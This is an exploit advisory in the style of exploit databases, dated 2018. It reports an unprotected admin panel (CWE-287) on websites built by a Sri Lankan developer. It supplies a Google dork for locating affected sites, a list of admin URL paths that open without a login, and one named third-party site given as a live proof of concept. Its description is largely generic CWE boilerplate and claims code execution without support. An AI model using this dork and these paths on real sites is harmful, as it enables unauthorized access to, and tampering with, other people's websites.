################################################################################################# # Exploit Title : Designed & Developed by Sacit.Lk SriLanka Improper Authentication Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 04/07/2018 # Vendor Homepage : sacit.lk # Tested On : Windows # Category : WebApps # Exploit Risk : Low # CWE : CWE-287 [ Improper Authentication ] ################################################################################################ # Description for Improper Authentication Vulnerability [ CWE-287 ] + When an actor claims to have a given identity, the software does not prove or insufficiently proves that the claim is correct. + If software incorrectly validates user logon information or allows using different techniques of malicious credentials gathering (e.g. brute force, spoofing or change the URL links without giving a username and pass), an attacker can gain certain privileges within the application or disclose sensitive information. + If the parameter is equal to "user" the application allows viewing the information, if it is equal to "admin", then it is possible to edit information on the page: + If an attacker changes the value of the "group" parameter to "admin", he will be able to modify the page. + Designed & Developed by Sacit SriLanka vulnerability results from software misconfiguration. + The attacker might be able to gain unauthorized access to the application and otherwise restricted areas and perform certain actions, e.g. disclose sensitive information, alter application, or even execute arbitrary code. + An attacker can use a variety of vectors to exploit this weakness, including brute-force, session fixation, and Man-in-the-Middle (MitM) attacks. Reference [ Short Explained by me ] => CWE-287: Improper Authentication [cwe.mitre.org] ################################################################################################# # Google Dork : intext:''Designed & Developed by SACIT'' site:lk # Exploit : No Username. No Password. Unprotected Admin Panel without username and pass. This is called as Improper Authentication Vulnerability. Just enter after the domain address url link => /admin/home.php useable admin control panel url links => /admin/home.php?job=categories /admin/add_categories.php /admin/home.php?job=fr_products /admin/fr_add_products.php ################################################################################################# # Example Site => sripaliecontractors.lk/admin/home.php => [ Proof of Concept ] => archive.is/A0UeJ ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################